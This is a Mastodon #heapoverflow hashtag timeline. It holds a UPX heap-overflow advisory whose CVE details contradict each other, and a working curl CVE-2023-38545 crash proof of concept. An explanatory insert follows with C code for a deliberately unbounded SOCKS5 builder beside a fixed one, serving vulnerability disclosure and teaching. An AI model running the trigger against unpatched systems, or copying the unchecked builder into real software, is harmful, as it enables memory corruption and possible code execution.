101010.pl is one of the many independent Mastodon servers you can use to participate in the fediverse.
101010.pl, the oldest Polish Mastodon server. We allow posts of up to 2048 characters.

Server stats: 480 active users

#heapoverflow

🛡 H3lium@infosec.exchange/:~#

Heap Buffer Overflow in UPX Identified

Date: March 26, 2024
CVE: To be assigned
Vulnerability Type: Buffer Errors
CWE: CWE-122
Sources: NIST (https://nvd.nist.gov/vuln/detail/CVE-2024-3209), VULNDB (https://vuldb.com/?ctiid.259055), VULNDB Submit (https://vuldb.com/?submit.304575)

Issue Summary

A heap buffer overflow vulnerability was identified in the Ultimate Packer for eXecutables (UPX), specifically in the commit 06b0de9c77551cd4e856d453e094d8a0b6ef0d6d. This issue occurs during the handling of certain data structures, leading to potential memory corruption. The vulnerability was discovered through fuzzing techniques using the Google OSS-Fuzz project.

Technical key findings

The vulnerability is caused by improper handling of input data, resulting in a heap buffer overflow. This overflow occurs in the handling of packed files during decompression, where the bounds of allocated heap memory are not properly checked.

Vulnerable products

- UPX version identified by commit 06b0de9c77551cd4e856d453e094d8a0b6ef0d6d.

Impact assessment

An attacker could exploit this vulnerability to execute arbitrary code on the target system or cause a denial of service through application crash, potentially compromising the system's integrity and availability.

Patches or workaround

No specific patches or workarounds were mentioned at the time of reporting. Users are advised to monitor the official UPX GitHub repository for updates.

Tags

#UPX #BufferOverflow #HeapOverflow #SecurityVulnerability #CVE
Harry Sintonen

Here's a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

gcc -xc -fsanitize=address - -lcurl <<EOF
#include <curl/curl.h>
#include <string.h>
int main(void)
{
  CURL *curl = curl_easy_init();
  if(curl) {
    char url[32768];
    memcpy(url, "https://", 8);
    memset(url + 8, 'A', sizeof(url) - 8 - 1);
    url[sizeof(url) - 1] = '\0';
    curl_easy_setopt(curl, CURLOPT_URL, url);
    (void)curl_easy_perform(curl);
    curl_easy_cleanup(curl);
  }
  return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out

Some comments:
• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly setting the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc implementations have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected.

See the advisory at https://curl.se/docs/CVE-2023-38545.html for more details.

#infosec
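The PoC above hands libcurl a hostname of roughly 32 KB and points it at a socks5h proxy; the advisory it links explains that the overflow happens while building the SOCKS5 request. The following is an added example, not curl's code and not part of Harry Sintonen's post: a minimal SOCKS5 CONNECT request builder that shows the bug class in isolation. RFC 1928 encodes a domain-name target as a single length byte followed by the name, so any name longer than 255 bytes cannot be expressed on the wire at all; a builder that trusts the caller's length and has no capacity argument both truncates that length byte and copies the whole name past the end of its heap buffer. The 16 KiB buffer size used in `main()` and the `socks5_*` names are assumptions chosen to mirror the PoC's geometry, not measurements of any libcurl build.

```c
/* Added example, not curl's code: a minimal SOCKS5 CONNECT builder showing
 * the bug class behind CVE-2023-38545. RFC 1928 gives the domain-name target
 * a one-byte length prefix, so names over 255 bytes cannot be sent at all.
 * The 16 KiB size in main() is an assumption mirroring the PoC above. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SOCKS5_MAX_HOSTLEN 255u   /* RFC 1928: one-byte length prefix */
enum socks5_rc { SOCKS5_OK = 0, SOCKS5_EHOSTLEN = -1, SOCKS5_ENOSPC = -2, SOCKS5_ECORRUPT = -3 };

/* VER CMD RSV ATYP LEN <host> PORT(2) */
static size_t socks5_connect_len(size_t hostlen) { return 4 + 1 + hostlen + 2; }

static void socks5_put_fields(uint8_t *buf, const char *host, size_t hostlen, uint16_t port)
{
    buf[0] = 0x05; buf[1] = 0x01; buf[2] = 0x00; buf[3] = 0x03; /* VER CMD RSV ATYP=domain */
    buf[4] = (uint8_t)hostlen;               /* silently truncated if hostlen > 255 */
    memcpy(buf + 5, host, hostlen);          /* writes hostlen bytes, whatever buf holds */
    buf[5 + hostlen] = (uint8_t)(port >> 8);
    buf[6 + hostlen] = (uint8_t)(port & 0xff);
}

/* Vulnerable pattern: no bound on the name and no capacity argument. A name
 * over 255 bytes gets a wrong length byte, and if buf is smaller than
 * socks5_connect_len(hostlen) the memcpy runs past the end of the allocation. */
static size_t socks5_connect_unchecked(uint8_t *buf, const char *host, uint16_t port)
{
    size_t hostlen = strlen(host);
    socks5_put_fields(buf, host, hostlen, port);
    return socks5_connect_len(hostlen);
}

/* Hardened: reject names the protocol cannot carry and never exceed cap. A
 * caller that must reach a longer name resolves it locally and sends an
 * IPv4/IPv6 ATYP instead, or fails cleanly; it never copies the name blindly. */
static int socks5_connect_checked(uint8_t *buf, size_t cap, const char *host,
                                  uint16_t port, size_t *outlen)
{
    size_t hostlen = strlen(host), need;
    if (hostlen == 0 || hostlen > SOCKS5_MAX_HOSTLEN) return SOCKS5_EHOSTLEN;
    need = socks5_connect_len(hostlen);
    if (need > cap) return SOCKS5_ENOSPC;
    socks5_put_fields(buf, host, hostlen, port);   /* exact: hostlen <= 255, need <= cap */
    *outlen = need;
    return SOCKS5_OK;
}

/* Constructed input: a name of hostlen 'A' bytes, like the PoC's URL. */
static char *make_host(size_t hostlen)
{
    char *h = malloc(hostlen + 1);
    memset(h, 'A', hostlen);
    h[hostlen] = '\0';
    return h;
}

/* Hardened builder into a cap-byte heap buffer, then verify the wire layout.
 * Returns bytes written on success, otherwise the negative socks5_rc. */
static int socks5_try_checked(size_t hostlen, size_t cap, uint16_t port)
{
    char *host = make_host(hostlen);
    uint8_t *buf = malloc(cap ? cap : 1);
    size_t n = 0;
    int rc = socks5_connect_checked(buf, cap, host, port, &n);
    if (rc == SOCKS5_OK) {
        int ok = buf[0] == 0x05 && buf[1] == 0x01 && buf[2] == 0x00 && buf[3] == 0x03 &&
                 buf[4] == hostlen && memcmp(buf + 5, host, hostlen) == 0 &&
                 buf[n - 2] == (port >> 8) && buf[n - 1] == (port & 0xff);
        rc = ok ? (int)n : SOCKS5_ECORRUPT;
    }
    free(buf); free(host);
    return rc;
}

/* Unchecked builder with a buffer that is exactly big enough, so the only
 * visible symptom is the wrong length byte, which is returned. */
static int socks5_unchecked_lenbyte(size_t hostlen)
{
    char *host = make_host(hostlen);
    uint8_t *buf = malloc(socks5_connect_len(hostlen));
    socks5_connect_unchecked(buf, host, 80);
    int lenbyte = buf[4];
    free(buf); free(host);
    return lenbyte;
}

/* Bytes the unchecked builder would write past a cap-byte buffer for the
 * PoC's url[urllen] ("https://" + 'A's + NUL); 0 if the request fits. */
static size_t poc_overflow_bytes(size_t urllen, size_t cap)
{
    size_t need = socks5_connect_len(urllen - strlen("https://") - 1);
    return need > cap ? need - cap : 0;
}

int main(void)
{
    printf("11-byte name, 64-byte buffer: %d bytes written\n", socks5_try_checked(11, 64, 443));
    printf("256-byte name: rc %d (rejected)\n", socks5_try_checked(256, 1024, 80));
    printf("299-byte name, unchecked length byte: %d\n", socks5_unchecked_lenbyte(299));
    printf("PoC url[32768] into 16 KiB: %zu bytes past the end\n", poc_overflow_bytes(32768, 16384));
    return 0;
}
```

The two builders write identical bytes for a well-formed name; the only difference is the pair of checks in `socks5_connect_checked`. That is the shape of fix to look for in a SOCKS client: the protocol limit (255) must be enforced before the length byte is written, and the destination capacity must be checked before the copy, because the first check alone still lets a 16 KB name overrun a smaller buffer.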
Astra Kernel

For #HeapOverflow it is not writing the vulnerable code 😲🤔

#infosec #chatgpt #openai
ITSEC News

Apple Patches Two iOS Zero-Days Abused for Years - Researchers revealed two zero-day security vulnerabilities affecting Apple's stock Mail app on iOS... more: https://threatpost.com/apple-patches-two-ios-zero-days-abused-for-years/155042/

#vulnerabilities #heapoverflow #ioszeroday #ios13.4.5 #iphone #hacks #ipad